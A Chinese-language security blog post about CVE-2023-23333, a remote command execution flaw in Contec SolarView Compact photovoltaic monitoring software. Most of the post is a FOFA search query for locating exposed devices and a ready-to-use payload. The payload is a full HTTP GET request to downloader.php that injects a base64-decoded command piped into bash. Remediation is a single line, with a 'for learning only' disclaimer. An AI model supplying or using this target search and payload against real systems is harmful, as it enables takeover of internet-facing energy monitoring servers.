探索网络安全新技术
攀登黑客技术最高峰

CVE-2023-23333:SolarView Compact RCE 任意命令执行漏洞

CVE-2023-23333:SolarView Compact RCE 任意命令执行漏洞-威武网安

漏洞说明

Contec SolarView Compact是日本Contec公司的一个应用系统,提供光伏发电测量系统。SolarView Compact 6.00以下存在命令注入漏洞,攻击者可以通过downloader.php绕过内部限制执行命令。

攻击者可通过该漏洞在服务器端任意执行代码,获取服务器权限。

影响版本

SolarView Compact <= 6.00

漏洞复现

fofa:body=”SolarView Compact” && title=”Top”

Payload

/downloader.php?file=;echo%20{base64-cmd}|base64%20-d|bash%00.zip
GET /downloader.php?file=;echo%20{bas64-cmd}|base64%20-d|bash%00.zip HTTP/1.1
Host: ip:port
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

tools有位大佬发帖说明base64编码后命令输出就正常了。

修复建议

升级至安全版本

本文章仅用于学习交流,不得用于非法用途

星标加关注,追洞不迷路

赞(0) 打赏
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《CVE-2023-23333:SolarView Compact RCE 任意命令执行漏洞》
文章链接:https://www.wevul.com/1578.html
本站所有内容均来自互联网,只限个人技术研究,禁止商业用途,请下载后24小时内删除。

评论 抢沙发

如果文章对你有帮助 可以打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册